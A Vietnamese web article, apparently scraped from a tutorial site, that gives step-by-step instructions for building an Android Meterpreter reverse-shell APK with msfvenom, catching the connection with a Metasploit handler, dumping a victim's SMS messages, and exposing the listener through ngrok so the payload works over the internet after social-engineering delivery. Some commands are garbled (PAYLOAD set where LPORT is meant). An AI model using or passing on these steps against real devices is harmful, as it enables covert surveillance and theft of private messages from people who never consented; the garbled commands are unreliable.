Tin Tức

Remote Access trong Hacking Đạo Đức

You are interested in Remote Access trong Hacking Đạo Đức right? So let's go together natuts.com look forward to seeing this article right here!

Truy cập từ xa là một lỗ hổng mà kẻ tấn công có thể kiểm soát bất kỳ thiết bị nào. Thông thường, tải về được sử dụng để kiểm soát từ xa. Tải về được gửi qua các cuộc tấn công kỹ thuật xã hội hoặc lừa đảo. Sau khi tải về được tiêm vào, cuộc tấn công thực sự bắt đầu. Tải về sẽ cung cấp một kết nối ngược. Thông thường, Metasploit framework được sử dụng để tạo ra các tải về. Có ba loại module tải về khác nhau trong Metasploit Framework:

Singles

Stagers

Stages

Hãy xem cách chúng ta có thể khai thác và có truy cập từ xa vào một thiết bị Android bằng cách sử dụng Metasploit. Trên Android, chúng ta cần sử dụng termux để chạy Metasploit. Sau khi cài đặt termux, chúng ta cần cài đặt framework Metasploit.

Sau khi cài đặt framework Metasploit, chỉ cần chạy lệnh pkg update && pkg upgrade để nâng cấp máy của bạn. Sau đó, gõ lệnh termux-setup-storage để tránh các vấn đề liên quan đến quyền hạn. termux-setup-storage là lệnh được sử dụng trong termux để cung cấp quyền lưu trữ. Điều này được thực hiện để lưu trữ tải về bên trong thiết bị hoặc sao chép tải về từ termux sang điện thoại di động. Bây giờ nếu bạn gõ lệnh ls, bạn có thể thấy một thư mục có tên là storage. ls có nghĩa là liệt kê thư mục hiện tại và là một lệnh được sử dụng trong Linux để liệt kê các tệp trong thư mục hiện tại.

Các Lệnh Cơ Bản:

  • $ pkg update && pkg upgrade
  • $ termux-setup-storage

Chúng ta có thể tạo ra các tải về khác nhau dựa trên yêu cầu. Hãy tạo ra một tải về đầu tiên để truy cập vào một thiết bị được kết nối với cùng một mạng. Cùng một mạng đề cập đến các thiết bị kết nối với nhau, trực tiếp hoặc thông qua một điểm phát sóng di động (mạng không dây). Hãy tạo ra một tải về có tên là Geeks.apk.

Tạo tải về bằng cách sử dụng lệnh sau, msfvenom chứa các tùy chọn dòng lệnh tiêu chuẩn được sử dụng để tạo tải về. lhost đại diện cho địa chỉ IP của bạn. Chỉ cần gõ lệnh ifconfig để biết địa chỉ IP của bạn. lport sẽ là số cổng, bạn có thể nhập số cổng của riêng bạn.

  • $ msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.60.255 lport=5321 R> Geeks.apk

Sau khi tạo ra tải về, sao chép tải về vào bộ nhớ của bạn bằng lệnh cp Geeks.apk storage. Bây giờ bạn có thể thấy tải về trong bộ nhớ bằng cách gõ cd storage và ls.

Bây giờ hãy vào thư mục storage và tải xuống Geeks.apk và cho phép tất cả các quyền. Điều này sẽ cung cấp một kết nối ngược cho máy chủ.

Hãy xem cách chúng ta có thể khai thác điều này. Chỉ cần nhập lệnh msfconsole. Điều này sẽ mở một giao diện mới. Sau đó, nhập các lệnh sau.

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST địa_chỉ_IP_của_bạn
msf6 exploit(multi/handler) > set PAYLOAD số_cổng_của_bạn
msf6 exploit(multi/handler) > exploit

Lưu ý: Nhập lhost và lport mà bạn đã nhập khi tạo tải về.

Bây giờ chúng ta đã có phiên meterpreter. Phiên meterpreter không gì khác ngoài một kết nối ngược. Bạn có thể gõ help nếu bạn muốn biết chúng ta có thể làm gì với phiên này.

Bạn có thể làm rất nhiều việc bằng tải về này. Hãy thử lấy tin nhắn từ thiết bị của nạn nhân, để làm điều này, bạn nên gõ lệnh dump_sms $HOME. dump_sms đề cập đến lệnh để gửi tất cả tin nhắn SMS từ thiết bị nạn nhân đến thiết bị của chúng tôi và $HOME đề cập đến vị trí để lưu trữ tin nhắn SMS. Chúng ta có thể di chuyển tệp tin nhắn SMS này từ thư mục home vào thư mục lưu trữ bằng cách sử dụng lệnh:

$ mv tên_tệp_tin_nhắn_sms storage
$ cd storage
$ mv tên_tệp_tin_nhắn_sms downloads

Bây giờ bạn có thể dễ dàng đọc tất cả các tin nhắn từ thư mục downloads.

Truy cập từ xa sẽ dẫn đến mất tính bảo mật. Một kẻ tấn công có thể làm bất cứ điều gì mà họ muốn. Nhưng điều này chỉ xảy ra ở localhost.

Bây giờ hãy xem cách chúng ta có thể khai thác thiết bị ở bất kỳ đâu trên thế giới. Đối với điều này, chúng ta cần tải xuống ngrok. Vì chúng ta đang khai thác qua WAN (Mạng diện rộng). Tải xuống ngrok cho Linux từ trang web ngrok. Trong termux, nhập lệnh sau:

$ cd storage // tham chiếu đến thay đổi thư mục từ home thành storage.
$ cd downloads // tham chiếu đến việc thay đổi thư mục từ storage thành downloads.
$ mv ngrok $HOME // di chuyển ngrok từ downloads vào thư mục home.
$ chmod +x ngrok // cung cấp quyền

Trong hầu hết các trường hợp, ngrok không chạy trong môi trường bình thường. Vì vậy cần phải tải xuống ubuntu hoặc bất kỳ hệ điều hành ngoài nào khác. Bạn có thể dễ dàng tải xuống ubuntu thông qua ứng dụng AnLinux.

Sau khi cài đặt ngrok thành công, đăng ký và xác minh mã thông báo xác thực của bạn bằng các lệnh sau. Bạn có thể tìm mã thông báo xác thực của mình sau khi đăng nhập vào ngrok.

$ ./ngrok config add-authtoken <token>

Bây giờ chúng ta cần chạy một máy chủ TCP để chuyển tiếp cổng. Để chạy máy chủ TCP, sử dụng lệnh sau.

$ ./ngrok tcp 5431

Việc tạo tải về tương tự như trước, nhưng lhost và lport phải được thay đổi theo ngrok. Trong trường hợp trên, LHOST sẽ là 6.tcp.ngrok.io và LPORT sẽ là 16960. Nó sẽ khác nhau mỗi khi chúng ta chạy máy chủ TCP bằng ngrok. ngrok cần kích hoạt phiên khác để thiết lập một kết nối.

$ msfvenom -p android/meterpreter/reverse_tcp lhost=6.tcp.ngrok.io lport=16960 R> Geeks.apk

Giống như trước, di chuyển tải về từ thư mục home vào thư mục downloads. Bây giờ tải về này nên được gửi đến thiết bị của nạn nhân và nó phụ thuộc vào kỹ năng kỹ thuật xã hội của bạn. Sau khi cài đặt tải về thành công trên thiết bị nạn nhân, chạy msfconsole để có phiên thông dịch. Đối với điều này, sử dụng các lệnh sau.

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
msf6 exploit(multi/handler) > set PAYLOAD số_cổng_của_bạn (trong trường hợp của tôi là 5544)
msf6 exploit(multi/handler) > exploit

Bây giờ, thông qua điều này, chúng ta đã có quyền truy cập vào thiết bị của nạn nhân. Chúng ta có thể làm rất nhiều việc mà nạn nhân không hề hay biết. Đây chính là cách truy cập từ xa hoạt động. Có rất nhiều cách để chúng ta có thể truy cập vào một thiết bị từ xa. Thông thường, các cửa sau được tạo ra để ở bên trong các thiết bị của nạn nhân. Tải về là một loại cửa sau thông qua đó chúng ta khai thác thiết bị mục tiêu.

Conclusion: So above is the Remote Access trong Hacking Đạo Đức article. Hopefully with this article you can help you in life, always follow and read our good articles on the website: natuts.com

Related Articles

Back to top button